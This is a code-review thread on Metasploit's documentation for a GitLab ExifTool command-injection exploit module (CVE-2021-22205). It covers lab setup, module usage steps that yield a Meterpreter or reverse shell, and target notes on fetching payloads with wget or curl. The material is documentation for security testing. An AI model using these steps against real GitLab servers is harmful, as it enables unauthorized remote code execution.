GitLab Unauth Command Injection via ExifTool (CVE-2021-22205) (#15816)
rapid7/metasploit-framework: documentation/modules/exploit/multi/http/gitlab_exif_rce.md

## Vulnerable Application

> ### Description

Reviewer: ```suggestion
### Description

```

> This module exploits an unauthenticated file upload and command injection vulenrability in GitLab Community Edition (CE) and Enterprise Edition (EE). The patched versions are 13.10.3, 13.9.6, and 13.8.8.

Reviewer 2: ```suggestion
This module exploits an unauthenticated file upload and command injection vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE). The patched versions are 13.10.3, 13.9.6, and 13.8.8.
```

> Exploitation will results in code execution as the git user.

Reviewer 2: ```suggestion
Exploitation will result in command execution as the git user.
```

> 

Reviewer: ```suggestion
```

### Installation

#### GitLab 13.10.2 on Ubuntu 20.04.2 x64 

* Download the [GitLab 13.10.2 debian package](https://packages.gitlab.com/gitlab/gitlab-ce/packages/ubuntu/focal/gitlab-ce_13.10.2-ce.0_amd64.deb)
* Install openssh-server (`sudo apt install openssh-server`)
* Install GitLab (`sudo dpkg -i gitlab-ce_13.10.2-ce.0_amd64.db`)
* Modify the `external_url` in `/etc/gitlab/gitlab.rb` to something like `external_url http://localhost`
* Run `sudo gitlab-ctl reconfigure`
* Done!

## Verification Steps

* Follow the above instructions to install GitLab 13.10.2
* Do: `use exploit/multi/http/gitlab_exif_rce`
* Do: `set RHOST <ip>`
* Do: `check`
* Verify the remote target is flagged as vulnerable
* Do: `set LHOST <ip>`
* Do: `set LPORT <port>`
* Do: `exploit`
* You should get a Meterpreter session.

## Scenarios

> ### GitLab 13.10.1 on Ubuntu 20.04.2 x64. Get Metepreter session. 

Reviewer: ```suggestion
### GitLab 13.10.1 on Ubuntu 20.04.2 x64. Get Meterpreter session. 
```

## Vulnerable Application

### Description

This module exploits an unauthenticated file upload and command injection vulnerability in GitLab Community Edition (CE) and
Enterprise Edition (EE). The patched versions are 13.10.3, 13.9.6, and 13.8.8.

Exploitation will result in command execution as the git user.

### Installation

> #### GitLab 13.10.2 on Ubuntu 20.04.2 x64

Reviewer 3: Yup can confirm that the public docker image can be used for testing. This is what I ended up with and it was super simple:
```
docker run --rm \
   --publish 10443:443 --publish 10080:80 --publish 10022:22 --publish 10587:587 --publish 10025:25 \
   --name gitlab \
   gitlab/gitlab-ce:13.10.2-ce.0
```

Gitlab is then available on tcp/10080.

> #### GitLab 13.10.2 on Ubuntu 20.04.2 x64

Reviewer: Docker ftw.

Exploitation will result in command execution as the git user.

### Installation

#### GitLab 13.10.2 on Ubuntu 20.04.2 x64

* Download [GitLab 13.10.2](https://packages.gitlab.com/gitlab/gitlab-ce/packages/ubuntu/focal/gitlab-ce_13.10.2-ce.0_amd64.deb)
* Install openssh-server (`sudo apt install openssh-server`)
* Install GitLab (`sudo dpkg -i gitlab-ce_13.10.2-ce.0_amd64.deb`)
* Modify the `external_url` in `/etc/gitlab/gitlab.rb` to something like `external_url http://localhost`
* Run `sudo gitlab-ctl reconfigure`
* Done!

## Verification Steps

* Follow the above instructions to install GitLab 13.10.2
* Do: `use exploit/multi/http/gitlab_exif_rce`
* Do: `set RHOST <ip>`
* Do: `check`
* Verify the remote target is flagged as vulnerable
* Do: `set LHOST <ip>`
* Do: `set LPORT <port>`
* Do: `exploit`
* You should get a Meterpreter session.

## Targets

### 0

By default, this targets GitLab with the `reverse_openssl` payload and returns a reverse shell.

### 1

By default, this target obtains a meterpreter session using `wget`. This target also supports
`lwprequest`, `curl`, and `printf`. However, due to the exploit's space constraints it's not

> recommended to use a meterpreter payload with `printf` due to the time it will take to write the payload.

Reviewer: It's probably taking longer because you're using a stageless payload.

Reviewer: FWIW, it may be helpful to default to a staged payload for maximum `CmdStager` efficiency.
